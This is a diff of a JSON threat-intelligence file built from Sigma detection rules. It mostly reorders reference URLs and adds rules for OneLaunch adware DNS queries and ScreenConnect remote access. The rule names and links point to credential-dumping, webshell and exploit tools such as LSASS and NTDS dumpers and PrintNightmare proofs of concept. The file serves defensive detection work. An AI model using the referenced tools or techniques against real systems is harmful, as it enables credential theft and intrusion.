"tags": [ @@ -39707,9 +39707,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ @@ -39740,8 +39740,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -39816,8 +39816,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ @@ -39974,8 +39974,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py", "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" ], "tags": [ @@ -40294,9 +40294,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], "tags": [ @@ -40523,11 +40523,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/cube0x0/CVE-2021-36934", "https://github.com/HuskyHacks/ShadowSteal", "https://www.google.com/search?q=%22reg.exe+save%22+sam", - "https://github.com/search?q=CVE-2021-36934", "https://github.com/FireFart/hivenightmare", - "https://github.com/cube0x0/CVE-2021-36934", + "https://github.com/search?q=CVE-2021-36934", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ @@ -40854,8 +40854,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml" ], "tags": [ @@ -40981,8 +40981,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml" ], "tags": [ @@ -41048,8 +41048,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", + "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml" ], "tags": [ @@ -41230,9 +41230,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], @@ -41365,8 +41365,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/last-byte/PersistenceSniper", + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml" ], "tags": [ @@ -41389,8 +41389,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml" ], "tags": [ @@ -41413,9 +41413,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/Sam0x90/status/1552011547974696960", - "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://twitter.com/Sam0x90/status/1552011547974696960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" ], "tags": [ @@ -41585,8 +41585,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md", "PT ESC rule and personal experience", + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" ], "tags": [ @@ -41619,8 +41619,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/465533/0/html", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" ], "tags": [ @@ -41898,11 +41898,11 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/Wh04m1001/SysmonEoP", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ @@ -42045,8 +42045,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://twitter.com/cyb3rops/status/1552932770464292864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ @@ -42115,8 +42115,8 @@ "logsource.category": "file_rename", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" ], "tags": [ @@ -42149,13 +42149,13 @@ "logsource.category": "file_executable_detected", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", - "https://en.wikipedia.org/wiki/IExpress", "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", + "https://en.wikipedia.org/wiki/IExpress", + "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -42251,8 +42251,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml" ], "tags": [ @@ -42387,8 +42387,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" ], "tags": [ @@ -42523,8 +42523,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "Internal Research", "https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml" ], "tags": [ @@ -42626,8 +42626,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://github.com/lclevy/firepwd", "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_access.yml" ], "tags": [ @@ -42728,8 +42728,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" ], "tags": [ @@ -42861,8 +42861,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", @@ -42931,8 +42931,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://twitter.com/neonprimetime/status/1436376497980428318", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", + "https://twitter.com/neonprimetime/status/1436376497980428318", "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml" ], @@ -42966,8 +42966,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://cydefops.com/vscode-data-exfiltration", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml" ], @@ -43034,8 +43034,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04", + "https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml" ], "tags": [ @@ -43168,8 +43168,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ @@ -43202,8 +43202,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://twitter.com/notwhickey/status/1333900137232523264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_appinstaller.yml" ], "tags": [ @@ -43236,8 +43236,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "Internal Research", + "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_cloudflared_communication.yml" ], "tags": [ @@ -43300,6 +43300,41 @@ "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", "value": "DNS Query Request By Regsvr32.EXE" }, + { + "description": "Detects DNS query requests to \"update.onelaunch.com\". This domain is associated with the OneLaunch adware application.\nWhen the OneLaunch application is installed it will attempt to get updates from this domain.\n", + "meta": { + "author": "Josh Nickels", + "creation_date": "2024/02/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "dns_query_win_onelaunch_update_service.yml", + "level": "low", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/", + "https://malware.guide/browser-hijacker/remove-onelaunch-virus/", + "https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml" + ], + "tags": [ + "attack.collection", + "attack.t1056" + ] + }, + "related": [ + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "df68f791-ad95-447f-a271-640a0dab9cf8", + "value": "DNS Query Request To OneLaunch Update Service" + }, { "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", "meta": { @@ -43347,8 +43382,8 @@ "logsource.product": "windows", "refs": [ "https://cydefops.com/devtunnels-unleashed", - "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security", + "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml" ], "tags": [ @@ -43382,11 +43417,11 @@ "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", - "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://redcanary.com/blog/raspberry-robin/", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml" ], "tags": [ @@ -43565,9 +43600,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml" ], "tags": [ @@ -43621,6 +43656,39 @@ "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to a system.", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "filename": "proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "related": [ + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "Remote Access Tool - ScreenConnect Installation Execution" + }, { "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", "meta": { @@ -43669,8 +43737,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1638069413717975046", "https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend", + "https://twitter.com/0gtweet/status/1638069413717975046", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml" ], "tags": [ @@ -43703,8 +43771,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml" ], "tags": [ @@ -43750,12 +43818,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.joeware.net/freetools/tools/adfind/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml" ], "tags": [ @@ -44021,8 +44089,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/countuponsec/status/910977826853068800", "https://twitter.com/countuponsec/status/910969424215232518", + "https://twitter.com/countuponsec/status/910977826853068800", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], @@ -44089,8 +44157,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml" ], "tags": [ @@ -44296,9 +44364,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml" ], "tags": [ @@ -44399,17 +44467,17 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", - "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", - "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", - "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -44439,13 +44507,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://ngrok.com/docs", "https://twitter.com/xorJosh/status/1598646907802451969", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml" ], "tags": [ @@ -44512,8 +44580,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml" ], "tags": [ @@ -44546,14 +44614,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + 